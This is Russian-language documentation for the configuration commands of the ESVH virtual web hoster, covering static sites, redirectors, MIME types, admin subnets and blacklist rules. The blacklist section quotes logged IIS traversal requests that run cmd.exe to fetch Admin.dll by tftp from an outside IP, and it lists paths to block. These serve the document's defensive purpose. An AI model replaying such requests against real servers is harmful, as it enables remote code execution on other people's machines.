Extra Systems Virtual Hoster


Описание файла конфигурации виртуальных серверов

Файл описания виртуальных серверов хостера ESVH является обычным текстовым файлом, каждая строчка которой может содержать не более одной команды. Возможны строчки не содержащие ни одной команды - пустые или с комментариями.

Строка команды состоит из полей, разделенных знаком ">". Первое поле всегда содержит код команды, а последующие поля в той же строке - параметры данной команды, количество и интерпретация которых зависит от кода команды. Ниже приводится список поддерживаемых в данный момент системой команд с описанием их параметров. В каждой строке после штатных параметров любой команды вы можете дописать любое количество своих полей с вашими комментариями: интерпретатор команд их просто не заметит, так как ограничивается считыванием из строки только тех параметров, которые требуются спецификацией текущей команды (код которой содержится в первом поле строки).

Следует отметить, что команды создания серверов во втором поле имеют имя создаваемого сервера (например, myserver.com), при этом предполагается, что служба DNS (не имеющая к ESVH никакого отношения) настроена правильно, так что используемое имя хоста разрешается ("резолвится") в тот IP-адрес, который закреплен за тем компьютером, на котором работает данный экземпляр ESVH. Это - обязательное условие, при несоблюдении которого сервер ESVH не сможет выполнять свои функции. (При всем своем желании - ведь на него просто не будут поступать никакие запросы.) Поэтому, при возникновении каких-либо проблем, необходимо сначала с помощью утилиты NSLOOKUP выяснить правильность настройки службы DNS, а уже потом пытаться искать ошибки в самом ESVH.

Команда CS

Команда CS предназначена для создания сервера из набора стаческих страниц. Повторяя команду нужное количество раз (каждый раз с различными параметрами) вы можете создать у себя любое нужное вам количество различных сайтов.

Номер параметраОписание
1 Код команды - CS
2 Имя создаваемого сервера - например, mysrv.com
3 Полное имя каталога (включающее имя диска и весь путь), который отводится для хранения статических html, gif, и т.д. файлов данного сайта
4 Имя html-файла (без полного пути), с которого начинается просмотр данного сайта (корневая страница)

Пример. Команда

CS > mysrv.com > c:\pages\mainuser > index.htm >

создает сервер mysrv.com, объекты которого расположены в каталоге c:\pages\mainuser, а корневой страницей является файл index.htm (имеющий, таким образом, полное имя c:\pages\mainuser\index.htm).

Команда CR

Команда CR предназначена для создания редиректора, перенаправляющего клиента на другой порт данного хоста или вообще на другой хост. Повторяя команду нужное количество раз (каждый раз с различными параметрами) вы можете создать у себя любое нужное вам количество редиректоров.

Номер параметраОписание
1 Код команды - CR
2 Имя создаваемого сервера - например, mysrv.com
3 Имя или IP-адрес машины, на которую должно производиться перенаправление
4 номер порта, на который должно производиться перенаправление
5 корневая страница, на которую должно производиться перенаправление (может быть пустым - в этом случае отрабатывается начальная страница "/")

Пример. Команда

CR > myserv.com  >  myserv.com  > 3080 >         >

создает сервер myserv.com путем редиректа на свой же хост, но на службу, находящуюся на порту 3080.

Команда CF

Команда CF полностью аналогична команде CR, за исключением того, что она формирует скрытый фрейм, тем самым скрывая истинный адрес сервера, на который производится перенаправление. Она имеет лишь один дополнительный параметр, который задает заголовок окна, в котором будет изображаться сайт. Повторяя команду нужное количество раз (каждый раз с различными параметрами) вы можете создать у себя любое нужное вам количество таких "скрытых" редиректоров.

Номер параметраОписание
1 Код команды - CF
2 Имя создаваемого сервера - например, mysrv.com
3 Имя или IP-адрес машины, на которую должно производиться перенаправление
4 номер порта, на который должно производиться перенаправление
5 корневая страница, на которую должно производиться перенаправление (может быть пустым - в этом случае отрабатывается начальная страница "/")
6 Заголовок окна, в котором будет изображаться сайт

Пример. Команда

CF > myserv.com  >  myserv.com  > 3080 >         > My best page >

создает сервер myserv.com путем скрытого редиректа на свой же хост, но на службу, находящуюся на порту 3080, при этом окно сайта будет иметь заголовок "My best page".

Команда FT

Команда FT служит для обеспечения правильного функционирования виртуальных серверов, заданных с помощью команды CS. Поскольку сервер ESVH сам занимается передачей клиенту всех файлов сервера типа CS, ему необходимо знать тип каждого файла, находящегося в соответствующем статическом каталоге. Команда FT, кроме самого кода команды, находящемся в первом поле, имеет два параметра:

Номер параметраОписание
1 Код команды - FT
2 расширение описываемого текущей командой файла - например, gif
3 MIME-тип описываемого файла - например image/gif

Файл конфигурации должен содержать столько строк описания различных типов файлов, сколько их реально используется на сайтах, заданных командой CS. Обычно, это как минимум htm, gif и jpg - что требует трех строчек. Пример:

FT > htm > text/html  >
FT > jpg > image/jpeg >
FT > gif > image/gif  >

Команда AH

Команда описания административной группы AH имеет два параметра: адрес группы и маска. Например, команда

AH > 192.168.3.0 > 255.255.255.0 >

определяет группу хостов с 192.168.3.0 по 192.168.3.255 как группу администраторов сервера, которым разрешено получать страницы статистики.

Если одной командой AH невозможно указать все административные машины, то ее можно повторить несколько раз, указывая последовательно все необходимые области.

Команда BS

Эта команда предназначена для защиты вашего сервера от хакеров. Она имеет один параметр - имя сервера, запрос которого приведет к автоматическому внесению данного клиента в "черный список". Такой клиент будет находиться в отключенном состоянии столько времени, сколько указано в параметре "Time" секции [Users].

Рекомендуется эту команду использовать, например, для блокировки клиентов, запрашивающих строки вида:


02.03.2002 21:06:15:804 X.X.X.X www /c/winnt/system32/cmd.exe?/c+dir
02.03.2002 21:06:24:727 X.X.X.X www /c/winnt/system32/cmd.exe?/c+tftp%20-i%20212.9.229.89%20GET%20Admin.dll%20c:\Admin.dll
02.03.2002 21:06:32:939 X.X.X.X www /c/winnt/system32/cmd.exe?/c+tftp%20-i%20212.9.229.89%20GET%20Admin.dll%20d:\Admin.dll
02.03.2002 21:06:41:261 X.X.X.X www /c/winnt/system32/cmd.exe?/c+tftp%20-i%20212.9.229.89%20GET%20Admin.dll%20e:\Admin.dll

(Эти строки взяты с реального лога ESVH, но адрес клиента из этических соображений уничтожен и приводится как "X.X.X.X".)

Для запрещения такой активности достаточно ввести в список запрещенных серверов имя "www":

BS > www > 
Команду BS можно повторить несколько раз, если требуется подобным образом "обозначить" не одно, а несколько имен серверов (каждый раз указывая ей новое имя в качестве параметра).

Команда BD

Назначение и использование (а также и формат) команды BD полностью совпадает с предыдущей командой - BS, за тем лишь исключением, что она работает с именем запрашиваемого хакером каталога, а не сервера.

Наиболее частый случай - запрос хакером объектов из каталогов /scripts/, /MSADC/ и /c/winnt/. Для борьбы с этим достаточно подать следующие команды:

BD > /scripts/ > 
BD > /MSADC/   > 
BD > /c/winnt/ >
При необходимости (периодически просматривая логи) вы можете подобным образом добавить в этот список и другие нежелательные каталоги.


Made by Vendor